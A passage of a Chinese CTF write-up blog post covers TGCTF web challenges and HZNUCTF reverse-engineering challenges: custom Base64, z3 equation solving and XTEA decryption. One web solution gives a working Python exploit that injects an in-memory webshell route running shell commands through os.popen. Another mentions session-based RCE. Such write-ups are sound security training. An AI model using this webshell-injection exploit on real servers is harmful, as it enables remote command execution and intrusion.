https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638699-\u56fe\u7247.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"484\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638705-\u56fe\u7247-1024x484.png\" alt=\"\" class=\"wp-image-169\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638705-\u56fe\u7247-1024x484.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638705-\u56fe\u7247-300x142.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638705-\u56fe\u7247-768x363.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638705-\u56fe\u7247-1536x726.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638705-\u56fe\u7247.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\u524d\u7aefGAME Plus<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u539f\u7406\u540c\u4e0a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"484\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638711-\u56fe\u7247-1024x484.png\" alt=\"\" class=\"wp-image-170\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638711-\u56fe\u7247-1024x484.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638711-\u56fe\u7247-300x142.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638711-\u56fe\u7247-768x363.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638711-\u56fe\u7247-1536x726.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638711-\u56fe\u7247.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">TG_wordpress<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e00\u4e2a\u4e2aCVE\u8bd5\u51fa\u6765\u7684\uff0c\u6700\u540e\u53d1\u73b0\u662f\u8fd9\u4e2a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"136\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638716-\u56fe\u7247-1024x136.png\" alt=\"\" class=\"wp-image-171\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638716-\u56fe\u7247-1024x136.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638716-\u56fe\u7247-300x40.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638716-\u56fe\u7247-768x102.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638716-\u56fe\u7247.png 1343w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\u719f\u6089\u7684\u914d\u65b9\uff0c\u719f\u6089\u7684\u5473\u9053<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee5\u4e3a\u662fssti\uff0c\u8bd5\u4e86\u4e00\u4e0b{}\u88abban\u4e86\uff0c\u7136\u540e\u8bbf\u95ee\u4e00\u4e0b\u8def\u7531\uff0c\u53d1\u73b0\u6709\u62a5\u9519\u56de\u663e\uff0c\u5c1d\u8bd5\u6253404\u5185\u5b58\u9a6c\u3002exp\u5982\u4e0b:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">import requests<br># \u5b9a\u4e49\u76ee\u6807 URL<br>url = 'http:\/\/node1.tgctf.woooo.tech:32357'<br># \u5b9a\u4e49 payload<br>payload = \"cat \/flagggggg_tgctf2025_asjdklalkcnkjassjhdlk\"<br>exp = f'''<br>def shell(request):<br>    import os<br>    res = os.popen(\"{payload}\").read()<br>    return Response(res)<br>config.add_route('cmd', '\/cmd')<br>config.add_view(shell, route_name='cmd')<br>config.commit()<br>'''<br># \u6784\u9020\u8bf7\u6c42\u6570\u636e<br>data = {\"expr\": exp}<br># \u53d1\u9001 POST \u8bf7\u6c42<br>res = requests.post(url, data=data)<br># \u53d1\u9001 GET \u8bf7\u6c42\u5e76\u6253\u5370\u7ed3\u679c<br>p = requests.get(url + '\/cmd')<br>print(p.text)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">TGCTF{1e254da2-538e-7c9a-f0ab-206d3255eb47}<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">AAA\u5077\u6e21\u9634\u5e73\uff08\u590d\u4ec7\uff09<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">ban\u4e86\u65e0\u53c2\uff0c\u67e5\u4e86\u8d44\u6599\uff0c\u8fd8\u6709\u7528session\u6765\u6253\uff0c\u7528\u5341\u516d\u8fdb\u5236\u4f20\u5165\u8fdb\u884crce<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"348\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638729-\u56fe\u7247-1024x348.png\" alt=\"\" class=\"wp-image-172\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638729-\u56fe\u7247-1024x348.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638729-\u56fe\u7247-300x102.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638729-\u56fe\u7247-768x261.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638729-\u56fe\u7247.png 1478w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"338\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638732-\u56fe\u7247-1024x338.png\" alt=\"\" class=\"wp-image-173\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638732-\u56fe\u7247-1024x338.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638732-\u56fe\u7247-300x99.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638732-\u56fe\u7247-768x253.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638732-\u56fe\u7247.png 1364w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Re<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">base64<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u7a0b\u5e8f\u4f7f\u7528\u81ea\u5b9a\u4e49Base64\u7f16\u7801\u8868\u5bf9\u8f93\u5165\u8fdb\u884c\u7f16\u7801\u3002\u76ee\u6807\u5b57\u7b26\u4e32<code>AwLdOEVEhIWtajB2CbCWCbTRVsFFC8hirfiXC9gWH9HQayCJVbB8CIF=<\/code>\u9700\u4f7f\u7528\u8be5\u8868\u89e3\u7801\u3002\u7f16\u7801\u8868\u4e3a<code>GLp\/+Wn7uqX8FQ2JDR1c0M6U53sjBwyxglmrCVdSThAfEOvPHaYZNzo4ktK9iebI<\/code>\uff0c\u4e14\u7f16\u7801\u65f6\u6bcf\u4e2a6\u4f4d\u7d22\u5f15\u7ecf\u8fc7<code>(index + 24) % 64<\/code>\u8f6c\u6362<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">exp<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">custom_table = \"GLp\/+Wn7uqX8FQ2JDR1c0M6U53sjBwyxglmrCVdSThAfEOvPHaYZNzo4ktK9iebI\"<br>base64_table = {char: idx for idx, char in enumerate(custom_table)}<br>encoded_str = \"AwLdOEVEhIWtajB2CbCWCbTRVsFFC8hirfiXC9gWH9HQayCJVbB8CIF=\".rstrip('=')<br># \u8f6c\u6362\u5b57\u7b26\u4e3a\u539f\u59cb6\u4f4d\u503c<br>decoded_6bit = [(base64_table[c] - 24) % 64 for c in encoded_str]<br># \u62fc\u63a5\u4e8c\u8fdb\u5236\u5b57\u7b26\u4e32<br>binary_str = ''.join(f\"{b:06b}\" for b in decoded_6bit)<br># \u586b\u5145\u5e76\u8f6c\u6362\u4e3a\u5b57\u8282<br>padded_len = len(binary_str) + (8 - len(binary_str) % 8) % 8<br>binary_str = binary_str.ljust(padded_len, '0')<br>bytes_data = bytes(int(binary_str[i:i+8], 2) for i in range(0, len(binary_str), 8))<br>print(bytes_data.decode('utf-8', errors='ignore'))<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">HZNUCTF{ad162c-2d94-434d-9222-b65dc76a32}<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u86c7\u5e74\u7684\u672c\u547d\u8bed\u8a00<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5148\u7528\u547d\u4ee4python pyinstxtractor.py output.exe \u89e3\u5305\u5f97\u5230pyc\u6587\u4ef6\u7136\u540e\u53cd\u7f16\u8bd1<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"858\" height=\"394\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638740-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-174\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638740-\u56fe\u7247.png 858w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638740-\u56fe\u7247-300x138.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638740-\u56fe\u7247-768x353.png 768w\" sizes=\"auto, (max-width: 858px) 100vw, 858px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u2f64ai\u68ad\uff0c\u5148z3\u6c42\u89e3\u7ebf\u6027\u2f45\u7a0b\u5f97\u5230\u5bf9\u5e94\u7684ascii\u7801<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from z3 import *<br># \u521d\u59cb\u5316 Z3 \u6c42\u89e3\u5668<br>s = Solver()<br># \u5b9a\u4e49\u53d8\u91cf vars[0] \u5230 vars[29]<br>vars = [Int(f'vars_{i}') for i in range(30)]<br># \u6dfb\u52a0\u7ea6\u675f\u6761\u4ef6\uff08\u65b9\u7a0b\uff09<br>s.add(7 * vars[0] == 504)<br>s.add(9 * vars[0] - 5 * vars[1] == 403)<br>s.add((2 * vars[0] - 5 * vars[1]) + 10 * vars[2] == 799)<br>s.add(3 * vars[0] + 8 * vars[1] + 15 * vars[2] + 20 * vars[3] == 2938)<br>s.add((5 * vars[0] + 15 * vars[1] + 20 * vars[2] - 19 * vars[3]) + 1 * vars[4] == 2042)<br>s.add((7 * vars[0] + 1 * vars[1] + 9 * vars[2] - 11 * vars[3]) + 2 * vars[4] + 5 * vars[5] == 1225)<br>s.add(11 * vars[0] + 22 * vars[1] + 33 * vars[2] + 44 * vars[3] + 55 * vars[4] + 66 * vars[5] - 77 * vars[6] == 7975)<br>s.add(((21 * vars[0] + 23 * vars[1] + 3 * vars[2] + 24 * vars[3] - 55 * vars[4]) + 6 * vars[5] - 7 * vars[6]) + 15 * vars[7] == 229)<br>s.add((2 * vars[0] + 26 * vars[1] + 13 * vars[2] + 0 * vars[3] - 65 * vars[4]) + 15 * vars[5] + 29 * vars[6] + 1 * vars[7] + 20 * vars[8] == 2107)<br>s.add((10 * vars[0] + 7 * vars[1] + -9 * vars[2] + 6 * vars[3] + 7 * vars[4] + 1 * vars[5] + 22 * vars[6] + 21 * vars[7] - 22 * vars[8]) + 30 * vars[9] == 4037)<br>s.add((15 * vars[0] + 59 * vars[1] + 56 * vars[2] + 66 * vars[3] + 7 * vars[4] + 1 * vars[5] - 122 * vars[6]) + 21 * vars[7] + 32 * vars[8] + 3 * vars[9] - 10 * vars[10] == 4950)<br>s.add((((13 * vars[0] + 66 * vars[1] + 29 * vars[2] + 39 * vars[3] - 33 * vars[4]) + 13 * vars[5] - 2 * vars[6]) + 42 * vars[7] + 62 * vars[8] + 1 * vars[9] - 10 * vars[10]) + 11 * vars[11] == 12544)<br>s.add((((23 * vars[0] + 6 * vars[1] + 29 * vars[2] + 3 * vars[3] - 3 * vars[4]) + 63 * vars[5] - 25 * vars[6]) + 2 * vars[7] + 32 * vars[8] + 1 * vars[9] - 10 * vars[10]) + 11 * vars[11] - 12 * vars[12] == 6585)<br>s.add(((((223 * vars[0] + 6 * vars[1] - 29 * vars[2] - 53 * vars[3] - 3 * vars[4]) + 3 * vars[5] - 65 * vars[6]) + 0 * vars[7] + 36 * vars[8] + 1 * vars[9] - 15 * vars[10]) + 16 * vars[11] - 18 * vars[12]) + 13 * vars[13] == 6893)<br>s.add(((((29 * vars[0] + 13 * vars[1] - 9 * vars[2] - 93 * vars[3]) + 33 * vars[4] + 6 * vars[5] + 65 * vars[6] + 1 * vars[7] - 36 * vars[8]) + 0 * vars[9] - 16 * vars[10]) + 96 * vars[11] - 68 * vars[12]) + 33 * vars[13] - 14 * vars[14] == 1883)<br>s.add((((69 * vars[0] + 77 * vars[1] - 93 * vars[2] - 12 * vars[3]) + 0 * vars[4] + 0 * vars[5] + 1 * vars[6] + 16 * vars[7] + 36 * vars[8] + 6 * vars[9] + 19 * vars[10] + 66 * vars[11] - 8 * vars[12]) + 38 * vars[13] - 16 * vars[14]) + 15 * vars[15] == 8257)<br>s.add(((((23 * vars[0] + 2 * vars[1] - 3 * vars[2] - 11 * vars[3]) + 12 * vars[4] + 24 * vars[5] + 1 * vars[6] + 6 * vars[7] + 14 * vars[8] - 0 * vars[9]) + 1 * vars[10] + 68 * vars[11] - 18 * vars[12]) + 68 * vars[13] - 26 * vars[14]) + 15 * vars[15] - 16 * vars[16] == 5847)<br>s.add((((((24 * vars[0] + 0 * vars[1] - 1 * vars[2] - 15 * vars[3]) + 13 * vars[4] + 4 * vars[5] + 16 * vars[6] + 67 * vars[7] + 146 * vars[8] - 50 * vars[9]) + 16 * vars[10] + 6 * vars[11] - 1 * vars[12]) + 69 * vars[13] - 27 * vars[14]) + 45 * vars[15] - 6 * vars[16]) + 17 * vars[17] == 18257)<br>s.add(((((25 * vars[0] + 26 * vars[1] - 89 * vars[2]) + 16 * vars[3] + 19 * vars[4] + 44 * vars[5] + 36 * vars[6] + 66 * vars[7] - 150 * vars[8] - 250 * vars[9]) + 166 * vars[10] + 126 * vars[11] - 11 * vars[12]) + 690 * vars[13] - 207 * vars[14]) + 46 * vars[15] + 6 * vars[16] + 7 * vars[17] - 18 * vars[18] == 12591)<br>s.add((((((5 * vars[0] + 26 * vars[1] + 8 * vars[2] + 160 * vars[3] + 9 * vars[4] - 4 * vars[5]) + 36 * vars[6] + 6 * vars[7] - 15 * vars[8] - 20 * vars[9]) + 66 * vars[10] + 16 * vars[11] - 1 * vars[12]) + 690 * vars[13] - 20 * vars[14]) + 46 * vars[15] + 6 * vars[16] + 7 * vars[17] - 18 * vars[18]) + 19 * vars[19] == 52041)<br>s.add(((((((29 * vars[0] - 26 * vars[1]) + 0 * vars[2] + 60 * vars[3] + 90 * vars[4] - 4 * vars[5]) + 6 * vars[6] + 6 * vars[7] - 16 * vars[8] - 21 * vars[9]) + 69 * vars[10] + 6 * vars[11] - 12 * vars[12]) + 69 * vars[13] - 20 * vars[14] - 46 * vars[15]) + 65 * vars[16] + 0 * vars[17] - 1 * vars[18]) + 39 * vars[19] - 20 * vars[20] == 20253)<br>s.add((((((((45 * vars[0] - 56 * vars[1]) + 10 * vars[2] + 650 * vars[3] - 900 * vars[4]) + 44 * vars[5] + 66 * vars[6] - 6 * vars[7] - 6 * vars[8] - 21 * vars[9]) + 9 * vars[10] - 6 * vars[11] - 12 * vars[12]) + 69 * vars[13] - 2 * vars[14] - 406 * vars[15]) + 651 * vars[16] + 2 * vars[17] - 10 * vars[18]) + 69 * vars[19] - 0 * vars[20]) + 21 * vars[21] == 18768)<br>s.add((((((555 * vars[0] - 6666 * vars[1]) + 70 * vars[2] + 510 * vars[3] - 90 * vars[4]) + 499 * vars[5] + 66 * vars[6] - 66 * vars[7] - 610 * vars[8] - 221 * vars[9]) + 9 * vars[10] - 23 * vars[11] - 102 * vars[12]) + 6 * vars[13] + 2050 * vars[14] - 406 * vars[15]) + 665 * vars[16] + 333 * vars[17] + 100 * vars[18] + 609 * vars[19] + 777 * vars[20] + 201 * vars[21] - 22 * vars[22] == 111844)<br>s.add((((((((1 * vars[0] - 22 * vars[1]) + 333 * vars[2] + 4444 * vars[3] - 5555 * vars[4]) + 6666 * vars[5] - 666 * vars[6]) + 676 * vars[7] - 660 * vars[8] - 22 * vars[9]) + 9 * vars[10] - 73 * vars[11] - 107 * vars[12]) + 6 * vars[13] + 250 * vars[14] - 6 * vars[15]) + 65 * vars[16] + 39 * vars[17] + 10 * vars[18] + 69 * vars[19] + 777 * vars[20] + 201 * vars[21] - 2 * vars[22]) + 23 * vars[23] == 159029)<br>s.add((((520 * vars[0] - 222 * vars[1]) + 333 * vars[2] + 4 * vars[3] - 56655 * vars[4]) + 6666 * vars[5] + 666 * vars[6] + 66 * vars[7] - 60 * vars[8] - 220 * vars[9]) + 99 * vars[10] + 73 * vars[11] + 1007 * vars[12] + 7777 * vars[13] + 2500 * vars[14] + 6666 * vars[15] + 605 * vars[16] + 390 * vars[17] + 100 * vars[18] + 609 * vars[19] + 99999 * vars[20] + 210 * vars[21] + 232 * vars[22] + 23 * vars[23] - 24 * vars[24] == 2762025)<br>s.add(((((1323 * vars[0] - 22 * vars[1]) + 333 * vars[2] + 4 * vars[3] - 55 * vars[4] + 666 * vars[5] + 666 * vars[6] + 66 * vars[7] - 660 * vars[8] - 220 * vars[9]) + 99 * vars[10] + 3 * vars[11] + 100 * vars[12] + 777 * vars[13] + 2500 * vars[14] + 6666 * vars[15] + 605 * vars[16] + 390 * vars[17] + 100 * vars[18] + 609 * vars[19] + 9999 * vars[20] + 210 * vars[21] + 232 * vars[22] + 23 * vars[23] - 24 * vars[24]) + 25 * vars[25] == 1551621))<br>s.add((((((777 * vars[0] - 22 * vars[1]) + 6969 * vars[2] + 4 * vars[3] - 55 * vars[4]) + 666 * vars[5] - 6 * vars[6]) + 96 * vars[7] - 60 * vars[8] - 220 * vars[9]) + 99 * vars[10] + 3 * vars[11] + 100 * vars[12] + 777 * vars[13] + 250 * vars[14] + 666 * vars[15] + 65 * vars[16] + 90 * vars[17] + 100 * vars[18] + 609 * vars[19] + 999 * vars[20] + 21 * vars[21] + 232 * vars[22] + 23 * vars[23] - 24 * vars[24]) + 25 * vars[25] - 26 * vars[26] == 948348)<br>s.add(((((((97 * vars[0] - 22 * vars[1]) + 6969 * vars[2] + 4 * vars[3] - 56 * vars[4]) + 96 * vars[5] - 6 * vars[6]) + 96 * vars[7] - 60 * vars[8] - 20 * vars[9]) + 99 * vars[10] + 3 * vars[11] + 10 * vars[12] + 707 * vars[13] + 250 * vars[14] + 666 * vars[15] + -9 * vars[16] + 90 * vars[17] + -2 * vars[18] + 609 * vars[19] + 0 * vars[20] + 21 * vars[21] + 2 * vars[22] + 23 * vars[23] - 24 * vars[24]) + 25 * vars[25] - 26 * vars[26]) + 27 * vars[27] == 777044)<br>s.add(((((((177 * vars[0] - 22 * vars[1]) + 699 * vars[2] + 64 * vars[3] - 56 * vars[4] - 96 * vars[5] - 66 * vars[6]) + 96 * vars[7] - 60 * vars[8] - 20 * vars[9]) + 99 * vars[10] + 3 * vars[11] + 10 * vars[12] + 707 * vars[13] + 250 * vars[14] + 666 * vars[15] + -9 * vars[16] + 0 * vars[17] + -2 * vars[18] + 69 * vars[19] + 0 * vars[20] + 21 * vars[21] + 222 * vars[22] + 23 * vars[23] - 224 * vars[24]) + 25 * vars[25] - 26 * vars[26]) + 27 * vars[27] - 28 * vars[28] == 185016)<br>s.add(((((((77 * vars[0] - 2 * vars[1]) + 6 * vars[2] + 6 * vars[3] - 96 * vars[4] - 9 * vars[5] - 6 * vars[6]) + 96 * vars[7] - 0 * vars[8] - 20 * vars[9]) + 99 * vars[10] + 3 * vars[11] + 10 * vars[12] + 707 * vars[13] + 250 * vars[14] + 666 * vars[15] + -9 * vars[16] + 0 * vars[17] + -2 * vars[18] + 9 * vars[19] + 0 * vars[20] + 21 * vars[21] + 222 * vars[22] + 23 * vars[23] - 224 * vars[24]) + 26 * vars[25] - -58 * vars[26]) + 27 * vars[27] - 2 * vars[28]) + 29 * vars[29] == 130106)<br># \u68c0\u67e5\u662f\u5426\u6709\u89e3<br>if s.check() == sat:<br>    m = s.model()<br>    solution = [m[vars[i]].as_long() for i in range(30)]<br>    print(\"Solution found:\", solution)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u518d\u9006\u5411\u7406\u89e3\u524d\u2faf\u7684\u8fc7\u7a0b\uff0c\u4e3b\u8981\u5224\u65ad\u6761\u4ef6\u4e3a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">if O0o00 != '111111116257645365477364777645752361':<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u518d\u5bf9\u5e94\u5206\u914d\u4f4d\u7f6e HZNUCTF{ad7fa-76a7-ff6a-fffa-7f7d6a}<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u6c34\u679c\u5fcd\u8005<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5229\u7528dnspy\u53cd\u7f16\u8bd1\u6587\u4ef6\uff0c\u627e\u5230game\/assets\/bin\/data\/Managed\/Assembly-CSarp.dll\u8fd9\u4e2a dll \u6587\u4ef6<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"812\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638753-\u56fe\u7247-1024x812.png\" alt=\"\" class=\"wp-image-175\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638753-\u56fe\u7247-1024x812.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638753-\u56fe\u7247-300x238.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638753-\u56fe\u7247-768x609.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638753-\u56fe\u7247-1536x1218.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638753-\u56fe\u7247.png 1640w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"> \u5728gamemanager\u91cc\u9762\u627e\u5230\u4e86\u52a0\u5bc6\u51fd\u6570\u548c\u5bc6\u6587\u5bc6\u94a5<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"673\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638757-\u56fe\u7247-1024x673.png\" alt=\"\" class=\"wp-image-176\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638757-\u56fe\u7247-1024x673.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638757-\u56fe\u7247-300x197.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638757-\u56fe\u7247-768x505.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638757-\u56fe\u7247-1536x1010.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638757-\u56fe\u7247.png 1956w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"594\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638763-\u56fe\u7247-1024x594.png\" alt=\"\" class=\"wp-image-177\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638763-\u56fe\u7247-1024x594.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638763-\u56fe\u7247-300x174.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638763-\u56fe\u7247-768x446.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638763-\u56fe\u7247.png 1258w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728\u7ebf\u5de5\u5177\u89e3\u5bc6<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"602\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638767-\u56fe\u7247-1024x602.png\" alt=\"\" class=\"wp-image-178\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638767-\u56fe\u7247-1024x602.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638767-\u56fe\u7247-300x176.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638767-\u56fe\u7247-768x451.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638767-\u56fe\u7247-1536x902.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638767-\u56fe\u7247-2048x1203.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">XTEA<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u7ed9\u4e86\u4e00\u4e2a\u538b\u7f29\u5305\u5bc6\u7801\uff0c\u5c06\u5b83\u5341\u516d\u8fdb\u5236\u4e4b\u540e\u4f5c\u4e3a\u8fed\u4ee3\u5e38\u91cf0x9E3779B9<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">TEA\u7b97\u6cd5<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">import struct<br>\u5e38\u91cf\u5b9a\u4e49<br>NUM_ROUNDS = 32<br>DELTA = 0x9E3779B9<br>UINT32_MASK = 0xFFFFFFFF<br>def decipher(delta, left, right, key):<br>    \"\"\"<br>    \u89e3\u5bc6\u51fd\u6570\uff08TEA \u7b97\u6cd5\u6539\u8fdb\u7248\uff09\u3002<br>\u53c2\u6570:<br>  delta -- \u5e38\u91cf\uff0c0x9E3779B9<br>  left  -- \u5de6\u534a\u90e8\u5206\u6570\u636e\uff08\u65e0\u7b26\u53f732\u4f4d\u6574\u6570\uff09<br>  right -- \u53f3\u534a\u90e8\u5206\u6570\u636e\uff08\u65e0\u7b26\u53f732\u4f4d\u6574\u6570\uff09<br>  key   -- \u957f\u5ea6\u4e3a4\u7684\u5bc6\u94a5\u5217\u8868\uff0c\u6bcf\u4e2a\u5143\u7d20\u5747\u4e3a\u65e0\u7b26\u53f732\u4f4d\u6574\u6570<br>  <br>\u8fd4\u56de:<br>  (new_left, new_right) \u89e3\u5bc6\u540e\u7684\u5de6\u53f3\u4e24\u90e8\u5206\u6570\u636e<br>\"\"\"<br>v0 = left<br>v1 = right<br># \u521d\u59cb sum \u503c\u4e3a -delta * NUM_ROUNDS\uff0c\u5373 -0xC6EF3720\uff0c\u6ce8\u610f\u4f7f\u7528 32 \u4f4d\u65e0\u7b26\u53f7\u8fd0\u7b97<br>sum_val = (-0xC6EF3720) &amp; UINT32_MASK<br><br>for _ in range(NUM_ROUNDS):<br>    # \u89e3\u5bc6\u53f3\u534a\u90e8\u5206<br>    temp = (key[((sum_val &gt;&gt; 11) &amp; 3)] + sum_val) &amp; UINT32_MASK<br>    temp ^= (v0 + (((v0 &gt;&gt; 5) ^ (v0 &lt;&lt; 4)) &amp; UINT32_MASK)) &amp; UINT32_MASK<br>    v1 = (v1 - temp) &amp; UINT32_MASK<br><br>    # \u7d2f\u52a0 sum \u503c<br>    sum_val = (sum_val + delta) &amp; UINT32_MASK<br><br>    # \u89e3\u5bc6\u5de6\u534a\u90e8\u5206<br>    temp = (key[(sum_val &amp; 3)] + sum_val) &amp; UINT32_MASK<br>    temp ^= (v1 + (((v1 &gt;&gt; 5) ^ (v1 &lt;&lt; 4)) &amp; UINT32_MASK)) &amp; UINT32_MASK<br>    v0 = (v0 - temp) &amp; UINT32_MASK<br><br>return v0, v1<br>def print_data(title, data):<br>    \"\"\"<br>    \u6253\u5370\u6570\u636e\u6570\u7ec4\uff0c\u4ee5\u5341\u516d\u8fdb\u5236\u663e\u793a\u6bcf\u4e2a\u65e0\u7b26\u53f732\u4f4d\u6574\u6570\u3002<br>    \"\"\"<br>    print(title)<br>    for num in data:<br>        print(\"0x%08X,\" % num, end=\" \")<br>    print(\"\\n\")<br>def print_as_string(values):<br>    \"\"\"<br>    \u5c06 uint32_t \u6570\u636e\uff08\u5927\u7aef\u5e8f\uff09\u8f6c\u6362\u4e3a\u5b57\u7b26\u4e32\u663e\u793a\u3002<br>    \u6bcf\u4e2a 